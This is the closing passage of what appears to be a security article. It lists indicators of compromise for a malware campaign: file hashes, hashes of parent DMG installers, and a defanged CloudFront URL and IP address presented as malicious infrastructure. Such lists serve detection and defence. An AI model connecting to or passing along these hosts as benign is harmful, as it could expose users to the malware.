269d5f15da3bc3522ca53a3399dbaf4848f86de35d78c636a78336d46c23951c
e3292268c1d0830e76c3e80b4ea57921b9171027e07f064ef3b867b6d0450191
93ff20ff59d4e82e9c0e3b08037c48886dc54b8ed37c19894e0a65c1af8612f6
c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580
16885c2443b610d80b30828b1445ca326adb727c48f06d073e4dcb70fe3e5c2e
1bc5d3cb3d885fad8230e01dc5f86145d16ed5552a0fa8725689635b96b681e1

Parent DMGs
f6cb7f9593d85f0cd1e81d5b9f520b74d9bf5e829206cefe05b956c0f7638c28
3e20c0b2979a368c7d38cf305f1f60693375165bb76150ad80dbd34e7e0550ed
c319761789afb6aa9cddadf340dfa2d4d659e4b420d6dfde9640cdc4c1d813b7
823c4d39b0d93a1358b4fa02539868944ce15df91f78a1142be26edf07a64a5a
45d50559f73e7c12f1d9aa06283182cb67ac953d285f044e77447569ca8a278c
f94c8712dd7716cfeac79e6e59fdca07db4452c5d239593f421f97246ee8ef41

Domains
http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security